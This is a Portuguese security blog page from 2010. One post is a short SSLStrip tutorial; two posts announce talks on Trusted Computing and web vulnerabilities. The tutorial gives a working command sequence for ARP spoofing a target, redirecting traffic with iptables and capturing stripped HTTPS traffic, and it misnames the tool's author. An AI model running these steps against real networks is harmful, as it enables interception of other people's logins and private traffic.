23 de junho de 2010

SSLStrip - Capturando tráfego SSL

Desde que Moxie Moulinsart exibiu seu SSLStrip na Blackhat, o MODO PARANÓICO de muitas pessoas começou a dar o alarme, e não é pra menos, já que com essa ferramenta qualquer pessoa pode capturar seu tráfego SSL sem problemas.

O funcionamento do SSLStrip é simples, substituindo todas as requisições "https://" de uma página por "http://", e realiza um MITM (Man-In-The-Middle) entre o servidor e o cliente. A ideia é que a vítima e o atacante se comuniquem através de HTTP, enquanto o atacante e o servidor se comunicam em HTTPS, com o certificado do servidor. Portanto, o atacante é capaz de ver todo o tráfego da vítima em texto plano.

Abaixo, segue um vídeo onde podemos ver o funcionamento dessa ferramenta:



Resumidamente, os passos seriam:

Configurar o IP Forwarding:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Realizar um ataque ARP MITM entre as 2 máquinas:

# arpspoof -i eth0 -t HOST_ALVO

Redirecionar o tráfego com iptables:

# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

Iniciar o SSLStrip, definindo um arquivo onde armazenará os dados capturados:

# python sslstrip.py -w arquivo

Espero que achem interessante!

Mais informações na página oficial do SSLStrip: http://www.thoughtcrime.org/software/sslstrip/

21 de junho de 2010

Palestra aprovada no FISL 11 - 2010

Pessoal, tenho o prazer de dar a notícias de que estarei no FISL esse ano, palestrando.
A palestra será sobre Trusted Computing e vocês podem conhecer um pouco mais sobre o assunto através do resumo e a proposta enviada ao FISL, abaixo:


Resumo:

Trusted Computing é uma tecnologia de segurança recente e emergente que objetiva elevar o nível de segurança da próxima geração de plataformas computacionais. A apresentação será de um paradigma generalista baseado nos padrões especificados pelo Trusted Computing Group (TCG).


Proposta:

Trusted Computing introduz muitos componentes novos na arquitetura computacional e baseia-se principalmente no Trusted Platform Module (TPM), uma plataforma segura que provê capacidades de criptografia e armazenamento seguro. Utilizando o TPM, os softwares executados na Trusted Platform podem ser mensurados para comprovar sua integridade e robustez através da certificação de que a execução do software forma uma cadeia de confiança e define inequivocamente o estado da plataforma. Muitos componentes da Trusted Computing estão disponíveis para a comunidade de software livre oferecendo a possibilidade de diminuirmos cada vez mais as ameaças à segurança que surgem a cada dia. Além disso, por ser uma tecnologia ainda em desenvolvimento, muitas oportunidades para desenvolver sistemas confiáveis e acrescentar coisas à esse paradigma existem.


Espero encontrá-los lá, senhores!
[ ]'s

14 de junho de 2010

Evento BotecoNet, sobre vulnerabilidades WEB

Pessoal, dia 24/06 participarei do BotecoNet 4Linux, apresentando o tema "Análise de vulnerabilidades em aplicações WEB", que será transmitido via WEB.
É possível assistir e fazer perguntas partir de uma plataforma que permite a interação através de vídeos e áudio.
As vagas são limitadas, mesmo para os participantes on-line, portanto inscrevam-se!
Para quem tiver interesse no assunto e queira inscrever-se, acesse o seguinte link:
http://www.4linux.com.br/node/50498

Espero que participem e gostem!